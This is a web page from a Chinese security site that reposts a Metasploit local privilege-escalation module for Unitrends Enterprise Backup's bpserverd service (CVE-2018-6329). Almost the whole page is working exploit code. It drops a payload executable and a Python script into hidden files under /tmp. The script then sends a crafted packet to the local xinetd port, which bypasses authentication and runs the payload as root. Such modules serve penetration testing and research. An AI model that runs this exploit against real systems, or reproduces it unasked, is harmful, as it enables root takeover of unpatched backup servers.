首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Unitrends Enterprise Backup bpserverd Privilege Escalation
来源:metasploit.com 作者:h00die 发布时间:2018-11-29  
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info, {
      'Name'           => 'Unitrends Enterprise Backup bpserverd Privilege Escalation',
      'Description'    => %q{
        It was discovered that the Unitrends bpserverd proprietary protocol, as exposed via xinetd,
        has an issue in which its authentication can be bypassed.  A remote attacker could use this
        issue to execute arbitrary commands with root privilege on the target system.
        This is very similar to exploits/linux/misc/ueb9_bpserverd however it runs against the
        localhost by dropping a python script on the local file system.  Unitrends stopped
        bpserverd from listening remotely on version 10.
       },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Cale Smith', # @0xC413
          'Benny Husted', # @BennyHusted
          'Jared Arave', # @iotennui
          'h00die' # msf adaptations
        ],
      'DisclosureDate' => 'Mar 14 2018',
      'Platform'       => 'linux',
      'Arch'           => [ARCH_X86],
      'References'     =>
        [
          ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/000005691'],
          ['URL', 'http://blog.redactedsec.net/exploits/2018/04/20/UEB9_tcp.html'],
          ['EDB', '44297'],
          ['CVE', '2018-6329']
        ],
      'Targets'        =>
        [
          [ 'UEB <= 10.0', { } ]
        ],
      'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 2 },
      'SessionTypes'   => ['shell', 'meterpreter'],
      'DefaultTarget'  => 0
      }
    ))
    register_advanced_options([
      OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"]),
      OptInt.new("BPSERVERDPORT", [true, "Port bpserverd is running on", 1743])
    ])
  end

  def exploit

    pl = generate_payload_exe
    exe_path = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}"
    print_status("Writing payload executable to '#{exe_path}'")

    write_file(exe_path, pl)
    #register_file_for_cleanup(exe_path)

pe_script = %Q{
import socket
import binascii
import struct
import time
import sys

RHOST = '127.0.0.1'
XINETDPORT = #{datastore['BPSERVERDPORT']}
cmd = "#{exe_path}"

def recv_timeout(the_socket,timeout=2):
    the_socket.setblocking(0)
    total_data=[];data='';begin=time.time()
    while 1:
        #if you got some data, then break after wait sec
        if total_data and time.time()-begin>timeout:
            break
        #if you got no data at all, wait a little longer
        elif time.time()-begin>timeout*2:
            break
        try:
            data=the_socket.recv(8192)
            if data:
                total_data.append(data)
                begin=time.time()
            else:
                time.sleep(0.1)
        except:
            pass
    return ''.join(total_data)

print "[+] attempting to connect to xinetd on {0}:{1}".format(RHOST, str(XINETDPORT))

try:
  s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s1.connect((RHOST,XINETDPORT))
except:
  print "[!] Failed to connect!"
  exit()

data = s1.recv(4096)
bpd_port = int(data[-8:-3])

try:
  pass
  s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s2.connect((RHOST, bpd_port))
except:
  print "[!] Failed to connect!"
  s1.close()
  exit()

print "[+] Connected! Sending the following cmd to {0}:{1}".format(RHOST,str(XINETDPORT))
print "[+] '{0}'".format(cmd)

cmd_len = chr(len(cmd) + 3)
packet_len = chr(len(cmd) + 23)

#https://github.com/rapid7/metasploit-framework/blob/76954957c740525cff2db5a60bcf936b4ee06c42/modules/exploits/linux/misc/ueb9_bpserverd.rb#L72
packet = '\\xa5\\x52\\x00\\x2d'
packet += '\\x00' * 3
packet += packet_len
packet += '\\x00' * 3
packet += '\\x01'
packet += '\\x00' * 3
packet += '\\x4c'
packet += '\\x00' * 3
packet += cmd_len
packet += cmd
packet += '\\x00' * 3

s1.send(packet)

data = recv_timeout(s2)

print data

s1.close()
}

    pes_path = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}"
    print_status("Writing privesc script to '#{pes_path}'")

    write_file(pes_path, pe_script)
    #register_file_for_cleanup(pes_path)

    print_status("Fixing permissions")
    cmd_exec("chmod +x #{exe_path} #{pes_path}")

    vprint_status cmd_exec("python #{pes_path} -c '#{exe_path}'")
  end

end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PHP imap_open Remote Code Exec
·WebKit JSC JIT - 'JSPropertyNa
·Linux Nested User Namespace id
·WebKit JIT - 'ByteCodeParser::
·Mac OS X libxpc MITM Privilege
·WebKit JSC - BytecodeGenerator
·TeamCity Agent XML-RPC Command
·knc (Kerberized NetCat) Denial
·Cisco WebEx Meetings Privilege
·Schneider Electric PLC - Sessi
·Netgear Unauthenticated Remote
·Linux Kernel 4.8 (Ubuntu 16.04
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved